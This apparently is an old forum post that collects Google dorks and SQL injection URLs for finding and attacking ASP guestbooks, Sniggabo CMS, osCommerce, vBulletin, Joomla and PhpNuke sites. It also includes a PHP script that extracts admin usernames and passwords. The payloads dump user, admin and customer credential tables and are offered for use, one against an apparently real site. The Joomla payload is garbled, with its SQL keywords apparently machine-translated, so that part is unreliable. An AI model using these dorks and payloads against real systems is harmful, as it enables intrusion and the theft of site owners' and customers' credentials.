About some injections

2010-1-31 08:01 | Posted by: admin | Views: 135 | Comments: 0 | Original author: 回梦游仙

ASP

Google Dork : intitle:WEBEYES GUEST BOOK inurl:.asp?id=
Remote SQL injection exploit:

http://[website]/[script]/yorum.asp?mesajid=11+union+select+0+from+msysobjects



Google Dork : inurl:/webCal3_detail.asp?event_id=
Remote SQL injection exploit:

http://[website]/[script]/webCal3_detail.asp?event_id=20814+union+select+1,2,3,4,5,6,7,8,9,10+from+msysobjects

_________________________________________________________________________________________________________
PHP

Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id

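<?php
// Build the request URL from the first command-line argument (the site base URL).
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
// split() was removed in PHP 7; explode() does the same literal split on "::".
$data = explode("::",$src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>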

__________________________________________________________________________________________________________

OsCommerce

Dork: inurl:"customer_testimonials.php"
http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
___________________________________________________________________________________________________________

vBulletin

DORK: inurl:"vbplaza.php?do=*"
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58
____________________________________________________________________________________________________________
Joomla

Dork : inurl:index.php?option=com_akobook
Exploit : http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*

_____________________________________________________________________________________________________________

Click here for MyBB
_____________________________________________________________________________________________________________

PhpNuke

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

